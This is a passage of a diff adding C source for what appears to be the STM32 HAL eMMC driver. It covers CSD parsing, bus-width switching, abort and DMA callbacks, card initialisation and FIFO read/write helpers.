pCSD->RdBlockLen = (uint8_t)((hmmc->CSD[1] & 0x000F0000U) >> 16U); + + pCSD->PartBlockRead = (uint8_t)((hmmc->CSD[1] & 0x00008000U) >> 15U); + + pCSD->WrBlockMisalign = (uint8_t)((hmmc->CSD[1] & 0x00004000U) >> 14U); + + pCSD->RdBlockMisalign = (uint8_t)((hmmc->CSD[1] & 0x00002000U) >> 13U); + + pCSD->DSRImpl = (uint8_t)((hmmc->CSD[1] & 0x00001000U) >> 12U); + + pCSD->Reserved2 = 0U; /*!< Reserved */ + + pCSD->DeviceSize = (((hmmc->CSD[1] & 0x000003FFU) << 2U) | ((hmmc->CSD[2] & 0xC0000000U) >> 30U)); + + pCSD->MaxRdCurrentVDDMin = (uint8_t)((hmmc->CSD[2] & 0x38000000U) >> 27U); + + pCSD->MaxRdCurrentVDDMax = (uint8_t)((hmmc->CSD[2] & 0x07000000U) >> 24U); + + pCSD->MaxWrCurrentVDDMin = (uint8_t)((hmmc->CSD[2] & 0x00E00000U) >> 21U); + + pCSD->MaxWrCurrentVDDMax = (uint8_t)((hmmc->CSD[2] & 0x001C0000U) >> 18U); + + pCSD->DeviceSizeMul = (uint8_t)((hmmc->CSD[2] & 0x00038000U) >> 15U); + + if(MMC_ReadExtCSD(hmmc, &block_nbr, 212, 0x0FFFFFFFU) != HAL_OK) /* Field SEC_COUNT [215:212] */ + { + return HAL_ERROR; + } + + if(hmmc->MmcCard.CardType == MMC_LOW_CAPACITY_CARD) + { + hmmc->MmcCard.BlockNbr = (pCSD->DeviceSize + 1U) ; + hmmc->MmcCard.BlockNbr *= (1UL << ((pCSD->DeviceSizeMul & 0x07U) + 2U)); + hmmc->MmcCard.BlockSize = (1UL << (pCSD->RdBlockLen & 0x0FU)); + hmmc->MmcCard.LogBlockNbr = (hmmc->MmcCard.BlockNbr) * ((hmmc->MmcCard.BlockSize) / 512U); + hmmc->MmcCard.LogBlockSize = 512U; + } + else if(hmmc->MmcCard.CardType == MMC_HIGH_CAPACITY_CARD) + { + hmmc->MmcCard.BlockNbr = block_nbr; + hmmc->MmcCard.LogBlockNbr = hmmc->MmcCard.BlockNbr; + hmmc->MmcCard.BlockSize = 512U; + hmmc->MmcCard.LogBlockSize = hmmc->MmcCard.BlockSize; + } + else + { + /* Clear all the static flags */ + __HAL_MMC_CLEAR_FLAG(hmmc, SDIO_STATIC_FLAGS); + hmmc->ErrorCode |= HAL_MMC_ERROR_UNSUPPORTED_FEATURE; + hmmc->State = HAL_MMC_STATE_READY; + return HAL_ERROR; + } + + pCSD->EraseGrSize = (uint8_t)((hmmc->CSD[2] & 0x00004000U) >> 14U); + + pCSD->EraseGrMul = (uint8_t)((hmmc->CSD[2] & 0x00003F80U) >> 7U); + + pCSD->WrProtectGrSize = (uint8_t)(hmmc->CSD[2] & 0x0000007FU); + + pCSD->WrProtectGrEnable = (uint8_t)((hmmc->CSD[3] & 0x80000000U) >> 31U); + + pCSD->ManDeflECC = (uint8_t)((hmmc->CSD[3] & 0x60000000U) >> 29U); + + pCSD->WrSpeedFact = (uint8_t)((hmmc->CSD[3] & 0x1C000000U) >> 26U); + + pCSD->MaxWrBlockLen= (uint8_t)((hmmc->CSD[3] & 0x03C00000U) >> 22U); + + pCSD->WriteBlockPaPartial = (uint8_t)((hmmc->CSD[3] & 0x00200000U) >> 21U); + + pCSD->Reserved3 = 0; + + pCSD->ContentProtectAppli = (uint8_t)((hmmc->CSD[3] & 0x00010000U) >> 16U); + + pCSD->FileFormatGroup = (uint8_t)((hmmc->CSD[3] & 0x00008000U) >> 15U); + + pCSD->CopyFlag = (uint8_t)((hmmc->CSD[3] & 0x00004000U) >> 14U); + + pCSD->PermWrProtect = (uint8_t)((hmmc->CSD[3] & 0x00002000U) >> 13U); + + pCSD->TempWrProtect = (uint8_t)((hmmc->CSD[3] & 0x00001000U) >> 12U); + + pCSD->FileFormat = (uint8_t)((hmmc->CSD[3] & 0x00000C00U) >> 10U); + + pCSD->ECC= (uint8_t)((hmmc->CSD[3] & 0x00000300U) >> 8U); + + pCSD->CSD_CRC = (uint8_t)((hmmc->CSD[3] & 0x000000FEU) >> 1U); + + pCSD->Reserved4 = 1; + + return HAL_OK; +} + +/** + * @brief Gets the MMC card info. + * @param hmmc: Pointer to MMC handle + * @param pCardInfo: Pointer to the HAL_MMC_CardInfoTypeDef structure that + * will contain the MMC card status information + * @retval HAL status + */ +HAL_StatusTypeDef HAL_MMC_GetCardInfo(MMC_HandleTypeDef *hmmc, HAL_MMC_CardInfoTypeDef *pCardInfo) +{ + pCardInfo->CardType = (uint32_t)(hmmc->MmcCard.CardType); + pCardInfo->Class = (uint32_t)(hmmc->MmcCard.Class); + pCardInfo->RelCardAdd = (uint32_t)(hmmc->MmcCard.RelCardAdd); + pCardInfo->BlockNbr = (uint32_t)(hmmc->MmcCard.BlockNbr); + pCardInfo->BlockSize = (uint32_t)(hmmc->MmcCard.BlockSize); + pCardInfo->LogBlockNbr = (uint32_t)(hmmc->MmcCard.LogBlockNbr); + pCardInfo->LogBlockSize = (uint32_t)(hmmc->MmcCard.LogBlockSize); + + return HAL_OK; +} + +/** + * @brief Enables wide bus operation for the requested card if supported by + * card. + * @param hmmc: Pointer to MMC handle + * @param WideMode: Specifies the MMC card wide bus mode + * This parameter can be one of the following values: + * @arg SDIO_BUS_WIDE_8B: 8-bit data transfer + * @arg SDIO_BUS_WIDE_4B: 4-bit data transfer + * @arg SDIO_BUS_WIDE_1B: 1-bit data transfer + * @retval HAL status + */ +HAL_StatusTypeDef HAL_MMC_ConfigWideBusOperation(MMC_HandleTypeDef *hmmc, uint32_t WideMode) +{ + __IO uint32_t count = 0U; + SDIO_InitTypeDef Init; + uint32_t errorstate; + uint32_t response = 0U, busy = 0U; + + /* Check the parameters */ + assert_param(IS_SDIO_BUS_WIDE(WideMode)); + + /* Change State */ + hmmc->State = HAL_MMC_STATE_BUSY; + + /* Update Clock for Bus mode update */ + Init.ClockEdge = SDIO_CLOCK_EDGE_RISING; + Init.ClockBypass = SDIO_CLOCK_BYPASS_DISABLE; + Init.ClockPowerSave = SDIO_CLOCK_POWER_SAVE_DISABLE; + Init.BusWide = WideMode; + Init.HardwareFlowControl = SDIO_HARDWARE_FLOW_CONTROL_DISABLE; + Init.ClockDiv = SDIO_INIT_CLK_DIV; + /* Initialize SDIO*/ + (void)SDIO_Init(hmmc->Instance, Init); + + if(WideMode == SDIO_BUS_WIDE_8B) + { + errorstate = SDMMC_CmdSwitch(hmmc->Instance, 0x03B70200U); + if(errorstate != HAL_MMC_ERROR_NONE) + { + hmmc->ErrorCode |= errorstate; + } + } + else if(WideMode == SDIO_BUS_WIDE_4B) + { + errorstate = SDMMC_CmdSwitch(hmmc->Instance, 0x03B70100U); + if(errorstate != HAL_MMC_ERROR_NONE) + { + hmmc->ErrorCode |= errorstate; + } + } + else if(WideMode == SDIO_BUS_WIDE_1B) + { + errorstate = SDMMC_CmdSwitch(hmmc->Instance, 0x03B70000U); + if(errorstate != HAL_MMC_ERROR_NONE) + { + hmmc->ErrorCode |= errorstate; + } + } + else + { + /* WideMode is not a valid argument*/ + hmmc->ErrorCode |= HAL_MMC_ERROR_PARAM; + } + + /* Check for switch error and violation of the trial number of sending CMD 13 */ + while(busy == 0U) + { + if(count == SDMMC_MAX_TRIAL) + { + hmmc->State = HAL_MMC_STATE_READY; + hmmc->ErrorCode |= HAL_MMC_ERROR_REQUEST_NOT_APPLICABLE; + return HAL_ERROR; + } + count++; + + /* While card is not ready for data and trial number for sending CMD13 is not exceeded */ + errorstate = SDMMC_CmdSendStatus(hmmc->Instance, (uint32_t)(((uint32_t)hmmc->MmcCard.RelCardAdd) << 16U)); + if(errorstate != HAL_MMC_ERROR_NONE) + { + hmmc->ErrorCode |= errorstate; + } + + /* Get command response */ + response = SDIO_GetResponse(hmmc->Instance, SDIO_RESP1); + + /* Get operating voltage*/ + busy = (((response >> 7U) == 1U) ? 0U : 1U); + } + + /* While card is not ready for data and trial number for sending CMD13 is not exceeded */ + count = SDMMC_DATATIMEOUT; + while((response & 0x00000100U) == 0U) + { + if(count == 0U) + { + hmmc->State = HAL_MMC_STATE_READY; + hmmc->ErrorCode |= HAL_MMC_ERROR_REQUEST_NOT_APPLICABLE; + return HAL_ERROR; + } + count--; + + /* While card is not ready for data and trial number for sending CMD13 is not exceeded */ + errorstate = SDMMC_CmdSendStatus(hmmc->Instance, (uint32_t)(((uint32_t)hmmc->MmcCard.RelCardAdd) << 16U)); + if(errorstate != HAL_MMC_ERROR_NONE) + { + hmmc->ErrorCode |= errorstate; + } + + /* Get command response */ + response = SDIO_GetResponse(hmmc->Instance, SDIO_RESP1); + } + + if(hmmc->ErrorCode != HAL_MMC_ERROR_NONE) + { + /* Clear all the static flags */ + __HAL_MMC_CLEAR_FLAG(hmmc, SDIO_STATIC_FLAGS); + hmmc->State = HAL_MMC_STATE_READY; + return HAL_ERROR; + } + else + { + /* Configure the SDIO peripheral */ + Init.ClockEdge = hmmc->Init.ClockEdge; + Init.ClockBypass = hmmc->Init.ClockBypass; + Init.ClockPowerSave = hmmc->Init.ClockPowerSave; + Init.BusWide = WideMode; + Init.HardwareFlowControl = hmmc->Init.HardwareFlowControl; + Init.ClockDiv = hmmc->Init.ClockDiv; + (void)SDIO_Init(hmmc->Instance, Init); + } + + /* Change State */ + hmmc->State = HAL_MMC_STATE_READY; + + return HAL_OK; +} + +/** + * @brief Gets the current mmc card data state. + * @param hmmc: pointer to MMC handle + * @retval Card state + */ +HAL_MMC_CardStateTypeDef HAL_MMC_GetCardState(MMC_HandleTypeDef *hmmc) +{ + uint32_t cardstate; + uint32_t errorstate; + uint32_t resp1 = 0U; + + errorstate = MMC_SendStatus(hmmc, &resp1); + if(errorstate != HAL_MMC_ERROR_NONE) + { + hmmc->ErrorCode |= errorstate; + } + + cardstate = ((resp1 >> 9U) & 0x0FU); + + return (HAL_MMC_CardStateTypeDef)cardstate; +} + +/** + * @brief Abort the current transfer and disable the MMC. + * @param hmmc: pointer to a MMC_HandleTypeDef structure that contains + * the configuration information for MMC module. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_MMC_Abort(MMC_HandleTypeDef *hmmc) +{ + HAL_MMC_CardStateTypeDef CardState; + + /* DIsable All interrupts */ + __HAL_MMC_DISABLE_IT(hmmc, SDIO_IT_DATAEND | SDIO_IT_DCRCFAIL | SDIO_IT_DTIMEOUT|\ + SDIO_IT_TXUNDERR| SDIO_IT_RXOVERR); + + /* Clear All flags */ + __HAL_MMC_CLEAR_FLAG(hmmc, SDIO_STATIC_DATA_FLAGS); + + if((hmmc->hdmatx != NULL) || (hmmc->hdmarx != NULL)) + { + /* Disable the MMC DMA request */ + hmmc->Instance->DCTRL &= (uint32_t)~((uint32_t)SDIO_DCTRL_DMAEN); + + /* Abort the MMC DMA Tx Stream */ + if(hmmc->hdmatx != NULL) + { + if(HAL_DMA_Abort(hmmc->hdmatx) != HAL_OK) + { + hmmc->ErrorCode |= HAL_MMC_ERROR_DMA; + } + } + /* Abort the MMC DMA Rx Stream */ + if(hmmc->hdmarx != NULL) + { + if(HAL_DMA_Abort(hmmc->hdmarx) != HAL_OK) + { + hmmc->ErrorCode |= HAL_MMC_ERROR_DMA; + } + } + } + + hmmc->State = HAL_MMC_STATE_READY; + + /* Initialize the MMC operation */ + hmmc->Context = MMC_CONTEXT_NONE; + + CardState = HAL_MMC_GetCardState(hmmc); + if((CardState == HAL_MMC_CARD_RECEIVING) || (CardState == HAL_MMC_CARD_SENDING)) + { + hmmc->ErrorCode = SDMMC_CmdStopTransfer(hmmc->Instance); + } + if(hmmc->ErrorCode != HAL_MMC_ERROR_NONE) + { + return HAL_ERROR; + } + return HAL_OK; +} + +/** + * @brief Abort the current transfer and disable the MMC (IT mode). + * @param hmmc: pointer to a MMC_HandleTypeDef structure that contains + * the configuration information for MMC module. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_MMC_Abort_IT(MMC_HandleTypeDef *hmmc) +{ + HAL_MMC_CardStateTypeDef CardState; + + /* DIsable All interrupts */ + __HAL_MMC_DISABLE_IT(hmmc, SDIO_IT_DATAEND | SDIO_IT_DCRCFAIL | SDIO_IT_DTIMEOUT|\ + SDIO_IT_TXUNDERR| SDIO_IT_RXOVERR); + + /* Clear All flags */ + __HAL_MMC_CLEAR_FLAG(hmmc, SDIO_STATIC_DATA_FLAGS); + + if((hmmc->hdmatx != NULL) || (hmmc->hdmarx != NULL)) + { + /* Disable the MMC DMA request */ + hmmc->Instance->DCTRL &= (uint32_t)~((uint32_t)SDIO_DCTRL_DMAEN); + + /* Abort the MMC DMA Tx Stream */ + if(hmmc->hdmatx != NULL) + { + hmmc->hdmatx->XferAbortCallback = MMC_DMATxAbort; + if(HAL_DMA_Abort_IT(hmmc->hdmatx) != HAL_OK) + { + hmmc->hdmatx = NULL; + } + } + /* Abort the MMC DMA Rx Stream */ + if(hmmc->hdmarx != NULL) + { + hmmc->hdmarx->XferAbortCallback = MMC_DMARxAbort; + if(HAL_DMA_Abort_IT(hmmc->hdmarx) != HAL_OK) + { + hmmc->hdmarx = NULL; + } + } + } + + /* No transfer ongoing on both DMA channels*/ + if((hmmc->hdmatx == NULL) && (hmmc->hdmarx == NULL)) + { + CardState = HAL_MMC_GetCardState(hmmc); + hmmc->State = HAL_MMC_STATE_READY; + + if((CardState == HAL_MMC_CARD_RECEIVING) || (CardState == HAL_MMC_CARD_SENDING)) + { + hmmc->ErrorCode = SDMMC_CmdStopTransfer(hmmc->Instance); + } + if(hmmc->ErrorCode != HAL_MMC_ERROR_NONE) + { + return HAL_ERROR; + } + else + { +#if defined (USE_HAL_MMC_REGISTER_CALLBACKS) && (USE_HAL_MMC_REGISTER_CALLBACKS == 1U) + hmmc->AbortCpltCallback(hmmc); +#else + HAL_MMC_AbortCallback(hmmc); +#endif + } + } + + return HAL_OK; +} + +/** + * @} + */ + +/** + * @} + */ + +/* Private function ----------------------------------------------------------*/ +/** @addtogroup MMC_Private_Functions + * @{ + */ + +/** + * @brief DMA MMC transmit process complete callback + * @param hdma: DMA handle + * @retval None + */ +static void MMC_DMATransmitCplt(DMA_HandleTypeDef *hdma) +{ + MMC_HandleTypeDef* hmmc = (MMC_HandleTypeDef* )(hdma->Parent); + + /* Enable DATAEND Interrupt */ + __HAL_MMC_ENABLE_IT(hmmc, (SDIO_IT_DATAEND)); +} + +/** + * @brief DMA MMC receive process complete callback + * @param hdma: DMA handle + * @retval None + */ +static void MMC_DMAReceiveCplt(DMA_HandleTypeDef *hdma) +{ + MMC_HandleTypeDef* hmmc = (MMC_HandleTypeDef* )(hdma->Parent); + uint32_t errorstate; + + /* Send stop command in multiblock write */ + if(hmmc->Context == (MMC_CONTEXT_READ_MULTIPLE_BLOCK | MMC_CONTEXT_DMA)) + { + errorstate = SDMMC_CmdStopTransfer(hmmc->Instance); + if(errorstate != HAL_MMC_ERROR_NONE) + { + hmmc->ErrorCode |= errorstate; +#if defined (USE_HAL_MMC_REGISTER_CALLBACKS) && (USE_HAL_MMC_REGISTER_CALLBACKS == 1U) + hmmc->ErrorCallback(hmmc); +#else + HAL_MMC_ErrorCallback(hmmc); +#endif + } + } + + /* Disable the DMA transfer for transmit request by setting the DMAEN bit + in the MMC DCTRL register */ + hmmc->Instance->DCTRL &= (uint32_t)~((uint32_t)SDIO_DCTRL_DMAEN); + + /* Clear all the static flags */ + __HAL_MMC_CLEAR_FLAG(hmmc, SDIO_STATIC_DATA_FLAGS); + + hmmc->State = HAL_MMC_STATE_READY; + +#if defined (USE_HAL_MMC_REGISTER_CALLBACKS) && (USE_HAL_MMC_REGISTER_CALLBACKS == 1U) + hmmc->RxCpltCallback(hmmc); +#else + HAL_MMC_RxCpltCallback(hmmc); +#endif +} + +/** + * @brief DMA MMC communication error callback + * @param hdma: DMA handle + * @retval None + */ +static void MMC_DMAError(DMA_HandleTypeDef *hdma) +{ + MMC_HandleTypeDef* hmmc = (MMC_HandleTypeDef* )(hdma->Parent); + HAL_MMC_CardStateTypeDef CardState; + uint32_t RxErrorCode, TxErrorCode; + + /* if DMA error is FIFO error ignore it */ + if(HAL_DMA_GetError(hdma) != HAL_DMA_ERROR_FE) + { + RxErrorCode = hmmc->hdmarx->ErrorCode; + TxErrorCode = hmmc->hdmatx->ErrorCode; + if((RxErrorCode == HAL_DMA_ERROR_TE) || (TxErrorCode == HAL_DMA_ERROR_TE)) + { + /* Clear All flags */ + __HAL_MMC_CLEAR_FLAG(hmmc, SDIO_STATIC_FLAGS); + + /* Disable All interrupts */ + __HAL_MMC_DISABLE_IT(hmmc, SDIO_IT_DATAEND | SDIO_IT_DCRCFAIL | SDIO_IT_DTIMEOUT|\ + SDIO_IT_TXUNDERR| SDIO_IT_RXOVERR); + + hmmc->ErrorCode |= HAL_MMC_ERROR_DMA; + CardState = HAL_MMC_GetCardState(hmmc); + if((CardState == HAL_MMC_CARD_RECEIVING) || (CardState == HAL_MMC_CARD_SENDING)) + { + hmmc->ErrorCode |= SDMMC_CmdStopTransfer(hmmc->Instance); + } + + hmmc->State= HAL_MMC_STATE_READY; + } + +#if defined (USE_HAL_MMC_REGISTER_CALLBACKS) && (USE_HAL_MMC_REGISTER_CALLBACKS == 1U) + hmmc->ErrorCallback(hmmc); +#else + HAL_MMC_ErrorCallback(hmmc); +#endif + } +} + +/** + * @brief DMA MMC Tx Abort callback + * @param hdma: DMA handle + * @retval None + */ +static void MMC_DMATxAbort(DMA_HandleTypeDef *hdma) +{ + MMC_HandleTypeDef* hmmc = (MMC_HandleTypeDef* )(hdma->Parent); + HAL_MMC_CardStateTypeDef CardState; + + if(hmmc->hdmatx != NULL) + { + hmmc->hdmatx = NULL; + } + + /* All DMA channels are aborted */ + if(hmmc->hdmarx == NULL) + { + CardState = HAL_MMC_GetCardState(hmmc); + hmmc->ErrorCode = HAL_MMC_ERROR_NONE; + hmmc->State = HAL_MMC_STATE_READY; + if((CardState == HAL_MMC_CARD_RECEIVING) || (CardState == HAL_MMC_CARD_SENDING)) + { + hmmc->ErrorCode |= SDMMC_CmdStopTransfer(hmmc->Instance); + + if(hmmc->ErrorCode != HAL_MMC_ERROR_NONE) + { +#if defined (USE_HAL_MMC_REGISTER_CALLBACKS) && (USE_HAL_MMC_REGISTER_CALLBACKS == 1U) + hmmc->AbortCpltCallback(hmmc); +#else + HAL_MMC_AbortCallback(hmmc); +#endif + } + else + { +#if defined (USE_HAL_MMC_REGISTER_CALLBACKS) && (USE_HAL_MMC_REGISTER_CALLBACKS == 1U) + hmmc->ErrorCallback(hmmc); +#else + HAL_MMC_ErrorCallback(hmmc); +#endif + } + } + } +} + +/** + * @brief DMA MMC Rx Abort callback + * @param hdma: DMA handle + * @retval None + */ +static void MMC_DMARxAbort(DMA_HandleTypeDef *hdma) +{ + MMC_HandleTypeDef* hmmc = (MMC_HandleTypeDef* )(hdma->Parent); + HAL_MMC_CardStateTypeDef CardState; + + if(hmmc->hdmarx != NULL) + { + hmmc->hdmarx = NULL; + } + + /* All DMA channels are aborted */ + if(hmmc->hdmatx == NULL) + { + CardState = HAL_MMC_GetCardState(hmmc); + hmmc->ErrorCode = HAL_MMC_ERROR_NONE; + hmmc->State = HAL_MMC_STATE_READY; + if((CardState == HAL_MMC_CARD_RECEIVING) || (CardState == HAL_MMC_CARD_SENDING)) + { + hmmc->ErrorCode |= SDMMC_CmdStopTransfer(hmmc->Instance); + + if(hmmc->ErrorCode != HAL_MMC_ERROR_NONE) + { +#if defined (USE_HAL_MMC_REGISTER_CALLBACKS) && (USE_HAL_MMC_REGISTER_CALLBACKS == 1U) + hmmc->AbortCpltCallback(hmmc); +#else + HAL_MMC_AbortCallback(hmmc); +#endif + } + else + { +#if defined (USE_HAL_MMC_REGISTER_CALLBACKS) && (USE_HAL_MMC_REGISTER_CALLBACKS == 1U) + hmmc->ErrorCallback(hmmc); +#else + HAL_MMC_ErrorCallback(hmmc); +#endif + } + } + } +} + +/** + * @brief Initializes the mmc card. + * @param hmmc: Pointer to MMC handle + * @retval MMC Card error state + */ +static uint32_t MMC_InitCard(MMC_HandleTypeDef *hmmc) +{ + HAL_MMC_CardCSDTypeDef CSD; + uint32_t errorstate; + uint16_t mmc_rca = 1U; + + /* Check the power State */ + if(SDIO_GetPowerState(hmmc->Instance) == 0U) + { + /* Power off */ + return HAL_MMC_ERROR_REQUEST_NOT_APPLICABLE; + } + + /* Send CMD2 ALL_SEND_CID */ + errorstate = SDMMC_CmdSendCID(hmmc->Instance); + if(errorstate != HAL_MMC_ERROR_NONE) + { + return errorstate; + } + else + { + /* Get Card identification number data */ + hmmc->CID[0U] = SDIO_GetResponse(hmmc->Instance, SDIO_RESP1); + hmmc->CID[1U] = SDIO_GetResponse(hmmc->Instance, SDIO_RESP2); + hmmc->CID[2U] = SDIO_GetResponse(hmmc->Instance, SDIO_RESP3); + hmmc->CID[3U] = SDIO_GetResponse(hmmc->Instance, SDIO_RESP4); + } + + /* Send CMD3 SET_REL_ADDR with argument 0 */ + /* MMC Card publishes its RCA. */ + errorstate = SDMMC_CmdSetRelAdd(hmmc->Instance, &mmc_rca); + if(errorstate != HAL_MMC_ERROR_NONE) + { + return errorstate; + } + + /* Get the MMC card RCA */ + hmmc->MmcCard.RelCardAdd = mmc_rca; + + /* Send CMD9 SEND_CSD with argument as card's RCA */ + errorstate = SDMMC_CmdSendCSD(hmmc->Instance, (uint32_t)(hmmc->MmcCard.RelCardAdd << 16U)); + if(errorstate != HAL_MMC_ERROR_NONE) + { + return errorstate; + } + else + { + /* Get Card Specific Data */ + hmmc->CSD[0U] = SDIO_GetResponse(hmmc->Instance, SDIO_RESP1); + hmmc->CSD[1U] = SDIO_GetResponse(hmmc->Instance, SDIO_RESP2); + hmmc->CSD[2U] = SDIO_GetResponse(hmmc->Instance, SDIO_RESP3); + hmmc->CSD[3U] = SDIO_GetResponse(hmmc->Instance, SDIO_RESP4); + } + + /* Get the Card Class */ + hmmc->MmcCard.Class = (SDIO_GetResponse(hmmc->Instance, SDIO_RESP2) >> 20U); + + /* Get CSD parameters */ + if (HAL_MMC_GetCardCSD(hmmc, &CSD) != HAL_OK) + { + return hmmc->ErrorCode; + } + + /* Select the Card */ + errorstate = SDMMC_CmdSelDesel(hmmc->Instance, (uint32_t)(((uint32_t)hmmc->MmcCard.RelCardAdd) << 16U)); + if(errorstate != HAL_MMC_ERROR_NONE) + { + return errorstate; + } + + /* Configure SDIO peripheral interface */ + (void)SDIO_Init(hmmc->Instance, hmmc->Init); + + /* All cards are initialized */ + return HAL_MMC_ERROR_NONE; +} + +/** + * @brief Enquires cards about their operating voltage and configures clock + * controls and stores MMC information that will be needed in future + * in the MMC handle. + * @param hmmc: Pointer to MMC handle + * @retval error state + */ +static uint32_t MMC_PowerON(MMC_HandleTypeDef *hmmc) +{ + __IO uint32_t count = 0U; + uint32_t response = 0U, validvoltage = 0U; + uint32_t errorstate; + + /* CMD0: GO_IDLE_STATE */ + errorstate = SDMMC_CmdGoIdleState(hmmc->Instance); + if(errorstate != HAL_MMC_ERROR_NONE) + { + return errorstate; + } + + while(validvoltage == 0U) + { + if(count++ == SDMMC_MAX_VOLT_TRIAL) + { + return HAL_MMC_ERROR_INVALID_VOLTRANGE; + } + + /* SEND CMD1 APP_CMD with MMC_HIGH_VOLTAGE_RANGE(0xC0FF8000) as argument */ + errorstate = SDMMC_CmdOpCondition(hmmc->Instance, eMMC_HIGH_VOLTAGE_RANGE); + if(errorstate != HAL_MMC_ERROR_NONE) + { + return HAL_MMC_ERROR_UNSUPPORTED_FEATURE; + } + + /* Get command response */ + response = SDIO_GetResponse(hmmc->Instance, SDIO_RESP1); + + /* Get operating voltage*/ + validvoltage = (((response >> 31U) == 1U) ? 1U : 0U); + } + + /* When power routine is finished and command returns valid voltage */ + if (((response & (0xFF000000U)) >> 24U) == 0xC0U) + { + hmmc->MmcCard.CardType = MMC_HIGH_CAPACITY_CARD; + } + else + { + hmmc->MmcCard.CardType = MMC_LOW_CAPACITY_CARD; + } + + return HAL_MMC_ERROR_NONE; +} + +/** + * @brief Turns the SDIO output signals off. + * @param hmmc: Pointer to MMC handle + * @retval None + */ +static void MMC_PowerOFF(MMC_HandleTypeDef *hmmc) +{ + /* Set Power State to OFF */ + (void)SDIO_PowerState_OFF(hmmc->Instance); +} + +/** + * @brief Returns the current card's status. + * @param hmmc: Pointer to MMC handle + * @param pCardStatus: pointer to the buffer that will contain the MMC card + * status (Card Status register) + * @retval error state + */ +static uint32_t MMC_SendStatus(MMC_HandleTypeDef *hmmc, uint32_t *pCardStatus) +{ + uint32_t errorstate; + + if(pCardStatus == NULL) + { + return HAL_MMC_ERROR_PARAM; + } + + /* Send Status command */ + errorstate = SDMMC_CmdSendStatus(hmmc->Instance, (uint32_t)(hmmc->MmcCard.RelCardAdd << 16U)); + if(errorstate != HAL_MMC_ERROR_NONE) + { + return errorstate; + } + + /* Get MMC card status */ + *pCardStatus = SDIO_GetResponse(hmmc->Instance, SDIO_RESP1); + + return HAL_MMC_ERROR_NONE; +} + +/** + * @brief Reads extended CSD register to get the sectors number of the device + * @param hmmc: Pointer to MMC handle + * @param pFieldData: Pointer to the read buffer + * @param FieldIndex: Index of the field to be read + * @param Timeout: Specify timeout value + * @retval HAL status + */ +static uint32_t MMC_ReadExtCSD(MMC_HandleTypeDef *hmmc, uint32_t *pFieldData, uint16_t FieldIndex, uint32_t Timeout) +{ + SDIO_DataInitTypeDef config; + uint32_t errorstate; + uint32_t tickstart = HAL_GetTick(); + uint32_t count; + uint32_t i = 0; + uint32_t tmp_data; + + hmmc->ErrorCode = HAL_MMC_ERROR_NONE; + + /* Initialize data control register */ + hmmc->Instance->DCTRL = 0; + + /* Configure the MMC DPSM (Data Path State Machine) */ + config.DataTimeOut = SDMMC_DATATIMEOUT; + config.DataLength = 512; + config.DataBlockSize = SDIO_DATABLOCK_SIZE_512B; + config.TransferDir = SDIO_TRANSFER_DIR_TO_SDIO; + config.TransferMode = SDIO_TRANSFER_MODE_BLOCK; + config.DPSM = SDIO_DPSM_ENABLE; + (void)SDIO_ConfigData(hmmc->Instance, &config); + + /* Set Block Size for Card */ + errorstate = SDMMC_CmdSendEXTCSD(hmmc->Instance, 0); + if(errorstate != HAL_MMC_ERROR_NONE) + { + /* Clear all the static flags */ + __HAL_MMC_CLEAR_FLAG(hmmc, SDIO_STATIC_FLAGS); + hmmc->ErrorCode |= errorstate; + hmmc->State = HAL_MMC_STATE_READY; + return HAL_ERROR; + } + + /* Poll on SDMMC flags */ + while(!__HAL_MMC_GET_FLAG(hmmc, SDIO_FLAG_RXOVERR | SDIO_FLAG_DCRCFAIL | SDIO_FLAG_DTIMEOUT | SDIO_FLAG_DATAEND)) + { + if(__HAL_MMC_GET_FLAG(hmmc, SDIO_FLAG_RXFIFOHF)) + { + /* Read data from SDMMC Rx FIFO */ + for(count = 0U; count < 8U; count++) + { + tmp_data = SDIO_ReadFIFO(hmmc->Instance); + /* eg : SEC_COUNT : FieldIndex = 212 => i+count = 53 */ + /* DEVICE_TYPE : FieldIndex = 196 => i+count = 49 */ + if ((i + count) == ((uint32_t)FieldIndex/4U)) + { + *pFieldData = tmp_data; + } + } + i += 8U; + } + + if(((HAL_GetTick()-tickstart) >= Timeout) || (Timeout == 0U)) + { + /* Clear all the static flags */ + __HAL_MMC_CLEAR_FLAG(hmmc, SDIO_STATIC_FLAGS); + hmmc->ErrorCode |= HAL_MMC_ERROR_TIMEOUT; + hmmc->State= HAL_MMC_STATE_READY; + return HAL_TIMEOUT; + } + } + + /* While card is not ready for data and trial number for sending CMD13 is not exceeded */ + errorstate = SDMMC_CmdSendStatus(hmmc->Instance, (uint32_t)(((uint32_t)hmmc->MmcCard.RelCardAdd) << 16)); + if(errorstate != HAL_MMC_ERROR_NONE) + { + hmmc->ErrorCode |= errorstate; + } + + /* Clear all the static flags */ + __HAL_MMC_CLEAR_FLAG(hmmc, SDIO_STATIC_DATA_FLAGS); + + hmmc->State = HAL_MMC_STATE_READY; + + return HAL_OK; +} + + +/** + * @brief Wrap up reading in non-blocking mode. + * @param hmmc: pointer to a MMC_HandleTypeDef structure that contains + * the configuration information. + * @retval None + */ +static void MMC_Read_IT(MMC_HandleTypeDef *hmmc) +{ + uint32_t count, data, dataremaining; + uint8_t* tmp; + + tmp = hmmc->pRxBuffPtr; + dataremaining = hmmc->RxXferSize; + + if (dataremaining > 0U) + { + /* Read data from SDIO Rx FIFO */ + for(count = 0U; count < 8U; count++) + { + data = SDIO_ReadFIFO(hmmc->Instance); + *tmp = (uint8_t)(data & 0xFFU); + tmp++; + dataremaining--; + *tmp = (uint8_t)((data >> 8U) & 0xFFU); + tmp++; + dataremaining--; + *tmp = (uint8_t)((data >> 16U) & 0xFFU); + tmp++; + dataremaining--; + *tmp = (uint8_t)((data >> 24U) & 0xFFU); + tmp++; + dataremaining--; + } + + hmmc->pRxBuffPtr = tmp; + hmmc->RxXferSize = dataremaining; + } +} + +/** + * @brief Wrap up writing in non-blocking mode. + * @param hmmc: pointer to a MMC_HandleTypeDef structure that contains + * the configuration information. + * @retval None + */ +static void MMC_Write_IT(MMC_HandleTypeDef *hmmc) +{ + uint32_t count, data, dataremaining; + uint8_t* tmp; + + tmp = hmmc->pTxBuffPtr; + dataremaining = hmmc->TxXferSize; + + if (dataremaining > 0U) + { + /* Write data to SDIO Tx FIFO */ + for(count = 0U; count < 8U; count++) + { + data = (uint32_t)(*tmp); + tmp++; + dataremaining--; + data |= ((uint32_t)(*tmp) << 8U); + tmp++; + dataremaining--; + data |= ((uint32_t)(*tmp) << 16U); + tmp++; + dataremaining--; + data |= ((uint32_t)(*tmp) << 24U); + tmp++; + dataremaining--; + 